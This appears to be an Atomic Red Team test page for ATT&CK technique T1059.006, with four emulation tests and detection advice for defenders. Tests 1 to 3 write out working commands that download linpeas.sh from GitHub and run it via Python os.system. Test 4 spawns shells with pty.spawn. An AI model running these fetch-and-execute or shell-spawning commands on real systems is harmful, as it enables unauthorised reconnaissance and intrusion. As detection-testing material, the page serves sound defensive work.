T1059.006 - Python#
Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.
Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.
Atomic Tests#
Atomic Test #1 - Execute shell script via python’s command mode arguement#
Download and execute shell script and write to file then execute locally using Python -c (command mode) Supported Platforms: linux
Dependencies: Run with sh!#
Description: Verify if python is in the environment variable path and attempt to import requests library.#
Check Prereq Commands:#
which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
Get Prereq Commands:#
pip install requests
Invoke-AtomicTest T1059.006 -TestNumbers 1 -GetPreReqs
Attack Commands: Run with sh#
which_python=$(which python || which python3 || which python3.9 || which python2)
$which_python -c 'import requests;import os;url = "https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh";malicious_command = "sh T1059.006-payload -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles";session = requests.session();source = session.get(url).content;fd = open("T1059.006-payload", "wb+");fd.write(source);fd.close();os.system(malicious_command)'
Invoke-AtomicTest T1059.006 -TestNumbers 1
Cleanup:#
rm T1059.006-payload
Invoke-AtomicTest T1059.006 -TestNumbers 1 -Cleanup
Atomic Test #2 - Execute Python via scripts#
Create Python file (.py) that downloads and executes shell script via executor arguments Supported Platforms: linux
Dependencies: Run with sh!#
Description: Requires Python#
Check Prereq Commands:#
which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
Get Prereq Commands:#
pip install requests
Invoke-AtomicTest T1059.006 -TestNumbers 2 -GetPreReqs
Attack Commands: Run with sh#
which_python=$(which python || which python3 || which python3.9 || which python2)
echo 'import requests' > T1059.006.py
echo 'import os' >> T1059.006.py
echo 'url = "https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh"' >> T1059.006.py
echo 'malicious_command = "sh T1059.006-payload -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles"' >> T1059.006.py
echo 'session = requests.session()' >> T1059.006.py
echo 'source = session.get(url).content' >> T1059.006.py
echo 'fd = open("T1059.006-payload", "wb+")' >> T1059.006.py
echo 'fd.write(source)' >> T1059.006.py
echo 'fd.close()' >> T1059.006.py
echo 'os.system(malicious_command)' >> T1059.006.py
$which_python T1059.006.py
Invoke-AtomicTest T1059.006 -TestNumbers 2
Cleanup:#
rm T1059.006.py T1059.006-payload
Invoke-AtomicTest T1059.006 -TestNumbers 2 -Cleanup
Atomic Test #3 - Execute Python via Python executables#
Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments
Supported Platforms: linux
Dependencies: Run with sh!#
Description: Requires Python#
Check Prereq Commands:#
which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
Get Prereq Commands:#
pip install requests
Invoke-AtomicTest T1059.006 -TestNumbers 3 -GetPreReqs
Attack Commands: Run with sh#
which_python=$(which python || which python3 || which python3.9 || which python2)
echo 'import requests' > T1059.006.py
echo 'import os' >> T1059.006.py
echo 'url = "https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh"' >> T1059.006.py
echo 'malicious_command = "sh T1059.006-payload -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles"' >> T1059.006.py
echo 'session = requests.session()' >> T1059.006.py
echo 'source = session.get(url).content' >> T1059.006.py
echo 'fd = open("T1059.006-payload", "wb+")' >> T1059.006.py
echo 'fd.write(source)' >> T1059.006.py
echo 'fd.close()' >> T1059.006.py
echo 'os.system(malicious_command)' >> T1059.006.py
$which_python -c 'import py_compile; py_compile.compile("T1059.006.py", "T1059.006.pyc")'
$which_python T1059.006.pyc
Invoke-AtomicTest T1059.006 -TestNumbers 3
Cleanup:#
rm T1059.006.pyc T1059.006.py T1059.006-payload
Invoke-AtomicTest T1059.006 -TestNumbers 3 -Cleanup
Atomic Test #4 - Python pty module and spawn function used to spawn sh or bash#
Uses the Python spawn function to spawn a sh shell followed by a bash shell. Per Volexity, this technique was observed in exploitation of Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence
Supported Platforms: linux
Dependencies: Run with sh!#
Description: Verify if python is in the environment variable path and attempt to import requests library.#
Check Prereq Commands:#
which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
Get Prereq Commands:#
pip install requests
Invoke-AtomicTest T1059.006 -TestNumbers 4 -GetPreReqs
Attack Commands: Run with sh#
which_python=$(which python || which python3 || which python3.9 || which python2)
$which_python -c "import pty;pty.spawn('/bin/sh')"
exit
$which_python -c "import pty;pty.spawn('/bin/bash')"
exit```
Invoke-AtomicTest T1059.006 -TestNumbers 4
Detection#
Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.